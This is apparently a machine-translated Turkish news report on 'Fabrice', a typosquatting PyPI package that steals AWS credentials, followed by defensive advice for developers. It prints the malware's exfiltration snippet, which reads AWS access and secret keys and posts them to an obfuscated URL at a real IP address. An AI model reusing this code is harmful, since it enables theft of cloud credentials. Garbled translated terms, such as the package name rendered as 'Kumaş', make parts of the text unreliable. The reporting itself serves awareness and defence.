Kötü amaçlı Python paketi “Kumaş” PyPI’de şunları taklit eder: “Kumaş” AWS kimlik bilgilerini çalacak ve binlerce kişiyi etkileyecek bir kütüphane. Nasıl çalıştığını öğrenin ve projelerinizi akıllı güvenlik uygulamalarıyla koruyun.
Socket Security’deki siber güvenlik araştırmacıları, Amazon Web Services’i aktif olarak toplayan Python Paket Dizininde (PyPI) “Fabrice” adlı kötü amaçlı bir Python paketi tespit etti (AWS) son üç yıldır şüphelenmeyen geliştiricilerin kimlik bilgileri.
SSH komutlarının yürütülmesi için meşru ve yaygın olarak kullanılan “fabric” kütüphanesini taklit eden bu paket 202 milyonun üzerinde indirme sayısına ulaştı; kötü amaçlı sürüm ise 2021’de ortaya çıktığı günden bu yana 37.000’den fazla indirildi.
Yazım hatası
Kötü amaçlı Fabrice paketi, orijinal “kumaş” kütüphanesiyle ilişkili güvenden yararlanmak üzere tasarlanmıştır. Bu tekniğe denir yazım hatası Dolandırıcıların, kullanıcıların popüler “kumaş” paketinin adını yanlış yazdığı durumlardan yararlandığı.
Kötü amaçlı yazılım, kimlik bilgilerini çalan, arka kapılar yükleyen ve platforma özel ek komut dosyaları çalıştıran veriler içerir. Paketin arkasındaki dolandırıcılar özellikle Amazon Web Services (AWS) kimlik bilgileriyle ilgileniyor. Saldırganlar şu anda Windows ve Linux cihazlarındaki kullanıcıları ve geliştiricileri hedef alıyor.
Linux ve Windows Cihazlarını Hedefleme
Linux’ta kötü amaçlı yazılım, uzak bir sunucudan indirilen komut dosyalarını depolamak ve çalıştırmak için kullanıcının ana dizini içinde gizli dizinler oluşturur. Bu komut dosyaları, etkinliklerini gizlemek için tasarlanmış olduğundan tespit edilmesi oldukça zordur.
Windows’ta, gizli Python komut dosyalarını çalıştırmak için VBScript’i kullanır ve bu da kötü amaçlı yürütülebilir dosyaları indirir. Bu yürütülebilir dosyalar daha sonra tekrar tekrar çalıştırılacak şekilde planlanır ve böylece virüslü sistemde kalıcılık sağlanır. Kötü amaçlı yazılım ayrıca izlerini gizlemek için ilk giriş noktasını silmeye çalışır.
Çalınan kimlik bilgileri Paris’e gönderildi
onun içinde rapor Yayınlanmadan önce Hackread.com ile paylaşıldığında, her iki yöntem de AWS kimlik bilgilerinin çıkarılmasına ve bunların Paris’te bulunan ve bir VPN hizmet sağlayıcısı olan M247 tarafından işletilen bir sunucuya gönderilmesine yol açar. Bu, saldırganların bulut kaynaklarına yetkisiz erişim için bu kimlik bilgilerini kötüye kullanmasına olanak tanıyabilir. Daha da kötüsü, araştırmacıların PyPI’ye yönelik uyarılarına rağmen kampanya aktif kalıyor.
AWS Kimlik Bilgilerinin Süzülmesi Örneği
session = boto3.Session()
cd = session.get_credentials()
ak = cd.access_key
sk = cd.secret_key
data = {"k": ak, "s": sk}
muri = "ht"+"tp"+":"+"//89.44.9.227/akkfuifkeifsa"
requests.post(muri, json=data, timeout=4
“Ciddi risk uydurma durumlarının farkına varan ekibimiz, daha geniş geliştirici topluluğunu korumak için bunu proaktif bir şekilde PyPI ekibine rapor ederek yayından kaldırdı. Yayınlandığı sırada hâlâ yayındadır.”
Soket Güvenliği
Uzman Yorumu
Rom Carmel, Kimlik Güvenliği platformunun Kurucu Ortağı ve CEO’su Onaylı son gelişmeyi değerlendirdi: “Kötü niyetli aktörler, geliştiricilerin bir kısmının kodları için yanlış paketi seçmek gibi çok insani bir hata yapacağı bir sayı oyunu oynayarak, geliştirici topluluğuna kötü amaçlı yazılım paketleri sunarak başarı elde etmeye devam ediyor.“
“Güvenlik farkındalığı eğitimini iyileştirmek ve güvenli kodlamaya yönelik süreçleri uygulamak gibi yöntemler, geliştiricilerin kimlik avında gördüğümüz gibi daha güvenli kararlar almasına yardımcı olma konusunda uzun bir yol kat edebilirken, güvenlik ekiplerinin kuruluşlarını varsayılan bir ihlal yaklaşımından korumak için adımlar atması gerekir.“ Rom uyardı.
“Neredeyse her gün gördüğümüz gibi kimlik bilgileriniz tehlikeye girdiğinde kuruluşunuzu korumak için savunma açısından derinlemesine düşünmemiz gerekir. Bu, yalnızca MFA’yı uygulamak değil aynı zamanda erişimin kullanılabilirliği ve saldırganların kullanabileceği ayrıcalıkların kapsamı açısından hesap ele geçirmeden kaynaklanan patlama yarıçapını da azaltmak anlamına gelir.“ tavsiye etti.
Geliştiriciler için Ek Güvenlik Önlemleri
Geliştiriciler herhangi bir projenin omurgasıdır. Onlardan elde edilebilecek bilgiler, yanlış ellere düşerse hazineye dönüşebilir. Son zamanlarda, Python geliştiricileri, özellikletehdit aktörleri tarafından yoğun bir şekilde hedef alındı. Verilerinizi ve hesaplarınızı bilgisayar korsanlarından ve kötü amaçlı yazılım saldırılarından korumaya yönelik bazı ipuçları:
- Haberdar Olun: PyPI gibi platformlardan gelen güvenlik önerileri konusunda kendinizi güncel tutun. Topluluk raporları ve güvenlik araştırması blogları, Fabrice gibi tehditlere karşı korunmada değerli olabilir.
- Yazım hatası olup olmadığını bir kez daha kontrol edin: Kurulumdan önce daima paketlerin adlarını iki kez kontrol edin. Hafif yazım hataları veya alışılmadık yayıncı adları gibi yazım hatası belirtileri olup olmadığına bakın.
- Güvenlik Araçlarını Kullanın: Projelerinizdeki bağımlılıklar için gerçek zamanlı izleme ve güvenlik kontrolleri sağlayan Socket for GitHub gibi araçları kullanın. Bu tür araçlar, şüpheli etkinlikleri veya bilinen kötü amaçlı paketleri otomatik olarak algılayıp uyarabilir.
- Düzenli Güvenlik Denetimleri: Projelerinizin yazılım bağımlılıklarını düzenli olarak gözden geçirin ve denetleyin. Tüm paketlerin güvenilir kaynaklardan geldiğinden ve meşru bir amaca hizmet ettiğinden emin olun.
- Hackread.com’u takip edin: En önemlisi Hackread.com’u takip edin.
İLGİLİ KONULAR
- Veri Biliminde Python’u öğrenmek neden önemlidir?
- 6 resmi Python deposu kripto madencilik kötü amaçlı yazılımlarıyla boğuşuyor
- PythonAnywhere Bulut Platformu Fidye Yazılımı Barındırmak Amacıyla Suistimal Edildi
- Python Uygulamalarındaki NTLM Kimlik Bilgisi Hırsızlığı Windows Güvenliğini Tehdit Ediyor
- Tehdit İstihbaratında Python: Siber Tehditleri Analiz Etme – Azaltma